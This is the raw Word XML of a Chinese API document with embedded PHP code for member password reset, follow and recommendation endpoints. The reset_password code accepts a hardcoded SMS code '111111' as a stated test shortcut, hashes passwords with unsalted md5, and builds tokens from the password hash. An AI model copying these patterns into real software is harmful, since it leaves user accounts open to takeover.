    <w:p w14:paraId="37343E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492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3E61F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7E4CC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修改密码失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F074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3DB3E3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22A1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A1AB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54455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81C2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07F2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/api/member/reset_password </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>重置会员密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FFE1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重置会员密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0484E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7A1F6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222C5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mobile    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户手机号（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198EC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password  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户密码（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BF3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code      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>短信验证码（必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>暂时测试用：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>111111</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079375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重置密码成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1637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token   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525938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重置密码失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E00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FE26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reset_password()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480616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92DC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191826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E99CA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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB8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9CF82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CC4F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1CF1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 input('param.mobile', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7589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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E30DA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32B8F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请填写绑定手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592FF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204382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FC71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9FA1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(!_isMobile($mobile)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F523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4631E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手机号码格式错误，请填写正确手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7A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407472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665B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C87C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input('param.password', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716F2F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(!$password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51801E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B2F10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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请填写用户密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179478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5EC7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E583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FD87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$code = input('param.code', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E4A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F40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8A714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请填写手机验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD69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52379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06A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CB54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($code != '111111') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B3B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BB2C7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手机验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748DD6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0063A4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98D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DE6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_codechecking($code, $mobile);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B565D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 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B479C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53F9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$data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C95A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6B958D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69D0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73E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DB::name('member')-&gt;where('mobile', $mobile)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133655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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B99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8E86E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该手机号码没有对应的绑定用户，请重新换手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D43D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306,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043E92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8223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92E9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($member['password'] == md5($password)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1508F1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31E7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重置密码成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128648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=&gt; _encrypt($member['id'] . '|www.ffxiang.cn|' . $member['password']),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B7E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5F56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78FC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8AB8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$member['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C79D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-&gt;setField('password', md5($password));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F75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_encrypt($member['id'] . '|www.ffxiang.cn|' . md5($password));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F1C1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5A492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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>重置密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059F3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4774AA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重置密码成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B7C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=&gt; $token,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F017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BF6E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E072C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5437E3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重置密码失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1684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DF01D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FACAB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37B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79FD94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4783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9AB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/api/member/follow_member </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关注｜取消关注会员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2550C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关注｜取消关注会员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260EB2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1CD2C3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C9BE5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63C5E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{Integer} member_id  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A706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用户关注｜取消关注会员成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04422F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follow   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标识位：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已关注；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已取消关注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3723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用户关注会员失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30660A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55A426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7408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follow_member()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F85B8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F348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7B343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$this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D84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4B4BE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4F9E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请先登录账号，然后关注会员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AEFC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2E11C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EB6C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B33C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input('param.member_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B1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 '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F12A5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9747F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会员</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153A8B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021345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4F68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($member_id == $this-&gt;memberId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59676B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F952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用户不可以关注自己</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E19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28975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BD21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FBD43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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC58D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$member_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E197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748C7F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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF71B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$data['gz_uid'] = $member_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE1A6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$member_guanzhu = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AE6C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4B85F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6D5A9B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(!empty($member_guanzhu)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480497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Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733936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-&gt;where($data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E05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-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3180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1057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 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户取消关注会员成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F514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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A141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D4D4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5E23D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2369F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$member_guanzhu_id = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3330F6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-&gt;insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D85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($member_guanzhu_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028175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B803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用户关注会员成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C1C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 =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419E8E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D705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F48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E4B9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1C03C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6E5D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该会员不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEDC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1EE33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FEAF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914A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F31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CFC7E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用户关注会员失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8A5F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08D1D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B154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F232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778A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/api/member/suggested_members </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推荐关注的会员列表（你的好友还关注了）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480DC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推荐关注的会员列表（你的好友还关注了）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5335CB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51DB9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7125EB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6C467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ret         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C14D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ret.username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推荐关注的会员名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCD5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ret.img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推荐关注的会员头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298FE9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ret.follow  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否已经关注该会员：</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10F524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用户关注会员失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2791C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1FB656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308E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suggested_members()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDD2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6D91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076AC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278299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84C04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7496B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56A7FA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054FD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45DA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CB00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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF6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$followed_member_ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BD7D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$to_be_followed_member_ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5574D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$followed_members = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECFF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-&gt;field('gz_uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E2B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-&gt;where($where)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256668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64BD0F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(count($followed_members) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FDB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($followed_members as $followed_member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E4E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$followed_member_ids[] = $followed_member['gz_uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463F6E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6E10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$followed_member_ids[] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7B5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(count($followed_member_ids) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624CE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$to_be_followed_members = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D085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-&gt;field('gz_uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A306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'in', $followed_member_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2AA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'not in', $followed_member_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BCA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5BAA13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6B12E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$to_be_followed_members = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765A83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-&gt;field('gz_uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09705E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-&gt;limit(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DDFC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D20F6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A38B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(count($to_be_followed_members) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41384D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($to_be_followed_members as $to_be_followed_member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28025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$to_be_followed_member_ids[] = $to_be_followed_member['gz_uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D459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F79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EB2A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C85C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(count($to_be_followed_member_ids) &gt;= 4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2793D1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 = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDA4A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'in', $to_be_followed_member_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D710F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-&gt;limit(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455BEF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72F41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(count($followed_member_ids) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199054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 = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510C54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-&gt;where('is_elite', 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611CF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'not in', $followed_member_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFE9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-&gt;limit(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547CF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5931FF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E1D97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 = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0036D8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-&gt;order('is_elite', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531CB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-&gt;limit(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA408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45E754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A51E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(count($suggested_members) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1785ED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($suggested_members as $key =&gt; $suggested_member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080414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($suggested_member['nickname']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F972A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$suggested_members[$key]['username'] = $suggested_member['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05440A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($suggested_member['user']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E7F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$suggested_members[$key]['username'] = $suggested_member['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447A8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($suggested_member['mobile']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD960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$suggested_members[$key]['username'] = substr($suggested_member['mobile'], 0, 3) . '****' . substr($suggested_member['mobile'], 7, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5D0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($suggested_member['email']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0585A5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$suggested_members[$key]['username'] = $suggested_member['email'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733417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073B3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$suggested_members[$key]['username'] = '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . _userName_id($suggested_member['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BFB5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9B4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$suggested_members[$key]['img'] = $suggested_member['img'] ? _imgUrl() . $suggested_member['img'] : '/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B212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$suggested_members[$key]['follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72366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/*$suggested_members[$key]['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C71F4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2AC76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$suggested_member['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7510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2BF7C0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AF9F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89C5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json($suggested_members);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267676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A396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D43B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{get} /api/member/fans </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>粉丝列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00013C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粉丝列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7FA0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会员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3CB7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3D587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05634C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page        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8AB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per_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD03A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{Json} result            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回粉丝列表数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B623B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total           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429999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per_page        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AEEB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current_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669DA6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{List} data              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
